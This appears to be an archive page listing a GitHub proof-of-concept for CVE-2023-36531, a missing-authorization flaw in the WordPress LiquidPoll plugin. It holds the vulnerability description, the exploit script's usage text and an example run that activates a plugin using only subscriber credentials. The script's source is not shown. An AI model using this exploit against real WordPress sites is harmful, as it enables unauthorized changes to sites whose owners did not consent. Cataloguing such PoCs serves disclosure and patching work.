CVE-2023-36531 PoC — WordPress plugin LiquidPoll 安全漏洞

Source

https://github.com/RandomRobbieBF/CVE-2023-36531

Associated Vulnerability

Title:WordPress plugin LiquidPoll 安全漏洞 (CVE-2023-36531)
Description:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress plugin LiquidPoll 3.3.68版本及之前版本存在安全漏洞，该漏洞源于缺少授权检查。

Description

LiquidPoll – Advanced Polls for Creators and Brands <= 3.3.68 - Missing Authorization via activate_addon

Readme

# CVE-2023-36531
LiquidPoll – Advanced Polls for Creators and Brands &lt;= 3.3.68 - Missing Authorization via activate_addon

Info
----

Needs a subscriber level user and the plugin needs to be disabled.
This will activate the plugin you provide.


Usage
---

```
usage: CVE-2023-36531.py [-h] -w URL -u USERNAME -p PASSWORD -a ADDON

WordPress CVE-2023-36531 Exploit

options:
  -h, --help            show this help message and exit
  -w URL, --url URL     URL of the WordPress site
  -u USERNAME, --username USERNAME
                        Username of your wordpress user
  -p PASSWORD, --password PASSWORD
                        Password of your wordpress password
  -a ADDON, --addon ADDON
                        Plugin Slug
```

Example
---

```
python3 CVE-2023-36531.py -w http://wordpress.lan -u user -p useruser1 -a wp-polls
Logged in successfully.
POST request sent successfully.
Plugin Activated.
```

File Snapshot


 [4.0K]  /data/pocs/6cf27a67550afd17ef52a6d28d31e058efb4e1f3
├── [2.4K]  CVE-2023-36531.py
├── [ 11K]  LICENSE
└── [ 917]  README.md

0 directories, 3 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!